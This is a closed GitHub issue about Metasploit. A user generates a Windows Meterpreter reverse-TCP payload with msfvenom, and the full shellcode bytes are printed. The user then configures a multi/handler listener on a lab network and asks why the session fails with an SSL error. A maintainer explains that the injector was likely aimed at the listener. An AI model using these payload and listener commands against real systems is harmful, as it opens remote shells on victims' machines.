Closed zoo143 closed 7 years ago
How are you generating the payload? msfvenom? Can you post the logs?
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=4444 -f python No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes Final size of python file: 1602 bytes buf = "" buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" buf += "\xff\xd5\x6a\x05\x68\xc0\xa8\x38\x04\x68\x02\x00\x11" buf += "\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea" buf += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5" buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec" buf += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02" buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a" buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53" buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9" buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40" buf += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57" buf += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9" buf += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0" buf += "\xb5\xa2\x56\x6a\x00\x53\xff\xd5" root@kali32:~# root@kali32:~# msfconsole
msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > msf exploit(handler) > set LHOST 192.168.56.4 LHOST => 192.168.56.4 msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.56.4 yes The listen address LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > exploit
[] Started reverse TCP handler on 192.168.56.4:4444 [] Starting the payload handler... [*] Sending stage (957999 bytes) to 192.168.56.119 [-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol
how did you invoke your payload with format 'python' on the target?
I noticed your expected behavior section is from 2015. Are you following some sort of tutorial or blog post about exploiting python programs?
yes, I follow this blog http://inaz2.hatenablog.com/entry/2015/07/13/011841
thanks
I followed the blog steps and it worked as expected. I'm suspecting you pointed the Python shellcode injector at the metasploit listener, instead of the vulnerable service. That would create the error you see here. The blog is confusing because the author uses port 4444 for both the vulnerable service and the listener. Try changing the ports and you will see what I mean.
Good luck.
Steps to reproduce
How'd you do it?
Expected behavior
it's to obtain meterpreter session. Meterpreter prompt should show up as below.
Current behavior
Metasploit version
Get this with the
version
command in msfconsole (orgit log -1 --pretty=oneline
for a source install).I installed Metasploit with:
OS
Linux kali32 4.6.0-kali1-686-pae #1 SMP Debian 4.6.4-1kali1 (2016-07-21) i686 GNU/Linux